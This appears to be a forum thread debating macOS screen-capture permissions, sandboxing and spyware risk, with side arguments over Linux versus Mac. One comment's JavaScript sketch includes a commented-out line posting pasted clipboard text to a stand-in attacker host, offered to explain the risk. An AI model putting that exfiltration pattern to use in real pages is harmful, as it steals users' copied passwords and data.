If someone figures out a way for this sort of thing to be unobtrusive while still being effective, I wouldn't mind it, but I haven't seen anything like that. The notification popups you suggest are both intrusive and ineffective because, honestly, if I want to do some task, anything that tries to alert me about something unrelated to that task ("hey, this needs net access" - sure, ok, whatever... I cannot think about that right now, I need to actually do what I want to do) is something I am very unlikely to put any thought into, so I'll just accept. I mean, I used to check the permissions on my Android mobile, but after a year or so I stopped, because at the end of the day the question is "do you want to run this program or not?" And considering I already downloaded the program to run it, the answer is obvious.

This stuff is really barely a notch above expecting people to read EULAs.


How often do you think most users need software that reads the screen, especially something other than the operating system's own screenshot tool?

As an iOS developer I run Xscope to check details of designs, I don't know, maybe once every two weeks? And I guess I've probably used Acorn's color picker outside its own window during the last year, but I'm not sure about that.

I'd imagine that most users need apps reading arbitrary pixels off their screen less often than I do. I'd appreciate a warning from the operating system when an app tries to do that.


> How often

I do not think the frequency of needing that functionality is really relevant: when you need to use it, you can either do it or you cannot.

But there are users who do need to use applications that capture the screen way more often than once every two weeks. One example would be Twitch and YouTube streamers (not necessarily about games - many stream other things, like creating art, programming, composing music, etc) who do that for several hours every day.

> do you think most users

There is no point talking about "most users", because really anything can be attributed to what "most users" do or don't do - "most users" is not something that is well defined. We can only talk about specific use cases.

After all, all users (which by definition include most users) start as not being able to do anything, that doesn't mean the OS should not be able to do anything.

> As an iOS developer I run Xscope to check details of designs, I don't know, maybe once every two weeks? And I guess I've probably used Acorn's color picker outside its own window during the last year, but I'm not sure about that.

These are also useful examples of cases where you need screen reading, but they are really niche. The most common is probably streaming, as I mentioned above, but there are other cases where you need frequent screen-reading capabilities - for example, documentation writers will often need to capture parts of the OS, either as screenshots or as short video segments (for interactive docs), to use in the documentation. It is also very helpful for customer support, on both sides of the equation (at a company I worked for many years ago, the employee responsible for tech support had SnagIt open all the time).

> I'd appreciate a warning from the operating system when an app tries to do that.

I suspect that if that warning ends up as part of your screenshot or video capture, you won't appreciate it that much :-P


But this is not about removing the ability to read screen content. It's about removing the ability to read screen content without telling the user.

That's why I think questions about frequency and "most users" (nebulous term, I admit) come into play: yes/no permission dialogs aren't the best and many users do just click through them without thinking, but there's a world of difference between asking several times a day and asking a couple of times a month.

If my usage is far below average, then I agree that it's probably better not try to restrict it. If, as I would guess, I use it more than most, then it feels exceptional enough that letting the user know when it's happening would be fine.

If you could give a permanent permission to a given app, I'd imagine even the daily streamers wouldn't be too badly inconvenienced.


> I'd turn that around: what is the point of security if the apps you download cannot do their job because of it? At the end of the day computers need to be useful, not to be burned and buried in a waste disposal field (where they'd be in their most secure state).

I'd like to phrase it as "security vs. usefulness, pick one".

Unfortunately, I don't see a good way out of this. The more secure apps and the OS gets, the less useful it is - it loses composability and interoperability, any remnants of them being mediated by third parties (basically, see how SaaS apps talk to each other, and imagine this is your desktop now). But the more useful an app or OS is, the easier it is to make users selfpwn themselves through a stupid or compromised download.

I refuse to accept that I'm not allowed to do whatever I want with my own device, including running code that does whatever it wants with other applications, and especially things the authors of those other applications didn't anticipate or want me to do. But then, I can't see how a regular person could use the same computer without fear of their passwords or data getting stolen.

Are there any smart people working on this? Do they have any suggestions?


So if it needs it to implement its features, you would like to know about it. Otherwise you inevitably get spyware.


I'd like to know about it indeed; what I wouldn't like is to be spammed with annoying UAC-like questions every time an application needs to do something, or even worse, not being able to do it at all.

And no, I won't get spyware. I never got spyware in the three decades I've used software, even when desktop systems were at the apex of their popularity and I used the most popular of them. I doubt I'll get any sort of spyware today, especially since I'm not even using an OS that spyware authors would bother with.


The very article this post is about describes spyware that any developer can implement. In effect, if you're using a Mac, any app can be spyware and you will never, ever know.


I didn't say that it is impossible to create spyware; I said that I won't get spyware. I am careful about what sort of software I download, and I don't download from shady places, at least not without first trying things in a controlled environment.

Note that I am not against such environments, quite the opposite, although I tend to prefer VMs like VirtualBox over OS sandboxes because - as the linked article shows - the latter are not as safe as VMs (yes, I know that VMs can also be compromised, but it is much harder and far rarer).

I believe that applications running locally on my computer should be able to do whatever they please (if bugs didn't make it impractical, I'd even like them to be able to read and write each other's memory), but a consequence of such a setup is that you need to be careful about which applications end up on the computer. So I am very thankful for any tool that helps with that - as long as it remains a tool and doesn't impose itself against my will.


You, my friend, are vulnerable like any other Mac user, to a trustworthy piece of software that has but a single dependency implementing the screen-reading mentioned in the article. Don't think for a second that "being careful" will save you. Apps aren't open source. This is the point of this article.


Something being technically possible and something being done are not the same. As I already wrote, it might theoretically be possible to create spyware, but unless I download a program that does that, it won't happen.

Programs cannot decide by themselves to be installed on a computer; the user has to do something for them to be installed. And no two users perform the exact same sequence of actions, so you can't claim that all users have the same likelihood of being affected by spyware.

Also, FWIW, when I say "apps" I mean it as a shorthand for "applications", and for a few messages upthread the discussion hasn't just been about macOS but about any OS. So apps can be open source (and personally, unless it is some piece of software I trust - usually older, widely used programs - or some game I got from a place I trust, I stick with open-source apps, with security indeed being a major reason).


Something malicious that is easily technically possible, carries no risk, and has significant economic upside will statistically occur, due to the simple distribution of motives at large.

+1, only you can decide to install a program. However, its total functional scope, "what it does", is never fully known unless it is open source. "Doing research" about the developer will not solve the lack of transparency in the tool you're installing. It is the consumer OS's responsibility to make sure third parties don't get access to data consumers would deem sensitive without proper authorization.


The Sandbox became the reason I left the Mac App Store and instead started selling my apps directly from my website using Paddle, and I haven't looked back since.

It's been one of the most catastrophic decisions Apple has ever made, and IMO it is hindering actual progress for desktop apps.


Felix Krause works for Google these days. Since he got hired he has become a bit more critical of the platform. Perhaps no more "I hope this doesn't piss off Apple" mentality?


The login dialog for the Itch.io desktop client is magically excluded from the accessible canvas on my OS X instance.


Knowing its dev, this doesn't surprise me :)


I was worried about something like this too. I was worried an app could steal my passwords from the clipboard. I checked, and at least a website can't just read from the clipboard. At least in theory... I still (often) fill the clipboard with random stuff after using it to transfer a password.


>I checked, at least a website can't just read from the clipboard. At least in theory

AFAIK the logic is that any user-initiated event (click, keystroke, touch, etc.) allows the page to see (and modify) clipboard contents for that interaction. So if you accidentally click on a rogue page, it's possible for your clipboard contents to be stolen.
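A rough sketch of that gating, hedged heavily: the exact policy varies by browser and has tightened over the years, but the common case is that a page only sees a populated `clipboardData` inside a user-initiated clipboard event such as "paste". The exfiltration URL in the comment is made up for illustration.

```javascript
// Hedged sketch: a page can typically only read clipboard contents inside a
// user-initiated clipboard event, via event.clipboardData.
function handlePaste(event) {
  const text = event.clipboardData.getData('text/plain');
  // A rogue page could exfiltrate the text here instead of just using it, e.g.:
  //   fetch('https://evil.example/steal', { method: 'POST', body: text });
  return text;
}

// In a real page this would be wired up as:
//   document.addEventListener('paste', handlePaste);
```

So the page cannot poll your clipboard at will, but one paste (or, in some older browsers, other user gestures) on a hostile page is enough.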


Most good password managers will do this for you automatically. When I copy a password out of 1Password, it doesn't stay in the clipboard forever, and there's an option to specify the amount of time before clearing it.
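That clearing behavior can be sketched roughly like this (a toy model, not 1Password's actual code; `clipboard` here is a hypothetical stand-in object with `get`/`set`):

```javascript
// Toy sketch of a password manager's "clear clipboard after N ms" option.
// `clipboard` is a hypothetical object exposing get() and set().
function copyWithTimeout(clipboard, secret, clearAfterMs = 30000) {
  clipboard.set(secret);
  return setTimeout(() => {
    // Only clear if our secret is still there; the user may have
    // copied something else in the meantime.
    if (clipboard.get() === secret) clipboard.set('');
  }, clearAfterMs);
}
```

The check before clearing matters: unconditionally wiping the clipboard would clobber whatever the user copied after the password.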


Something has to give with the Mac ecosystem. The Mac App Store sucks, and the Mac has continually had serious security issues over the past few years.

I believe Apple is at a crossroads, something needs to be done with the Mac.


Don't panic.


Maybe Krause can also write an article on the pasteboard and get some more clicks.


I remember in the Windows XP days there was an app you could run that would show an alert any time a program tried to hook into your keyboard input or display. I wonder why nothing like that exists anymore.


Seems like a nice feature for something like Little Snitch.


Viewing your screen should be subject to permissions, simply because it can bypass every other permission guarding sensitive data.


This is why I run Qubes. Trusting all the software running on my system is unreasonable. Other OSes need to catch up ASAP.


Why wouldn't we assume that?


[flagged]


Golly gee, I can barely hear you all the way up there on your pedestal.

I used Linux for a good long while. Started with Ubuntu, then moved to Mint, then Arch as I became more of a "power user". But you know what? Sometimes I don't want to put in manual effort to get things to work, even if that means I lose some customization. Over my years with Linux, I've had driver issues with displays, with the network manager, with mounting remote drives... Basically any interaction with the hardware was a solid kick in the groin. Since switching to a MacBook, everything has been smooth sailing.

And especially nowadays, with Homebrew and Docker, all the tools I need are available on a Mac; it's a more integrated experience, and IMHO it looks better. But if you like Linux and it works for you, that's also fine by me. To each their own.


Funny, that. I use Linux because it just works, Macs are a pain, and Windows is just laughable.

What annoys me about the last decade or so of Mac developers is the terrible prevalence of things like "curl | bash", custom package managers, unversioned software, etc.

This could just be the company I work for, but as far as I'm concerned, software is not released unless there is a package and instructions for installing it. Deb, rpm, even a tarball is fine. Anything that downloads something from a random website is not.

Now obviously Mac developers don't enforce this attitude, but it does seem to correlate.


I used to run Linux before switching to Mac, around 10 years ago. Recently got a Dell XPS 13 and installed Ubuntu (then Mint).

To install stuff on Ubuntu I used a couple of PPAs. How is that any different from curl | bash? You're blindly trusting some repo either way.

Also, please refer me to this magical distro that just works, because here is what I saw before going back to Mac:

- HiDPI scaling does not just work. There are weird issues here and there.

- Closing the lid does not reliably put the laptop to sleep. Sometimes when it does, opening it does not just wake it up.

- Once in a while, the OS completely forgot that it had a Wi-Fi device. I just restarted and it returned.

I don't have time to test workarounds, read logs, try different distros, and shit like that. I have never once had to think twice before tossing a MacBook into my pack because it might still be awake.

I love Linux on servers, and I used to love it on my desktop, but that was back in high school / college, when I had too much time and tweaked things until they were just perfect.


I have Linux on my MacBook. Am I a real developer?

Edit: pls respond.


Using Linux has slight advantages only for devops, and even then, why would they need it when they can spin up an EC2 instance, run a Docker container, or use Vagrant? macOS offers superior UX to Linux (unless you invest heaps of engineering hours into setting up your window manager and environment to a usable state). More modern distributions like Mint or elementary OS might offer something on par, but even then the simplicity and ubiquity of Macs make those benefits fade.

The only reason to use Linux is extra operational security, but that's not usually a programmer's main concern.


Linux has a superior UI to the Mac. Hell, by default you don't even get virtual desktops on a Mac!

Mint is over a decade old, hardly "modern".

Wasn't the whole point of Mac to "think different"?



Yeah, no.


You are sitting on this OS as an administrator/root, and apps can do anything they want. I don't really see this as an issue. It's always been this way! Go run Qubes OS if you want to protect against this.


> > How can I protect myself as a user?

> To my knowledge there is no way to protect yourself as of now.

That is the biggest bit of FUD in this. There's a very easy way for a user to protect themselves: don't download any untrusted applications. Only run code you trust. Don't put that much trust in the sandbox.

Vulnerabilities like the Android MMS one, where anyone could send an image to any phone number and pwn the device, were genuinely "as a user you can't protect yourself" situations.

Local roots and things like this require a user to opt in to being exploited by running a malicious app. That's significantly different, and less scary.


How can you know the app you're using hasn't been compromised? I'm publishing a blog post about this specific topic next Thursday.



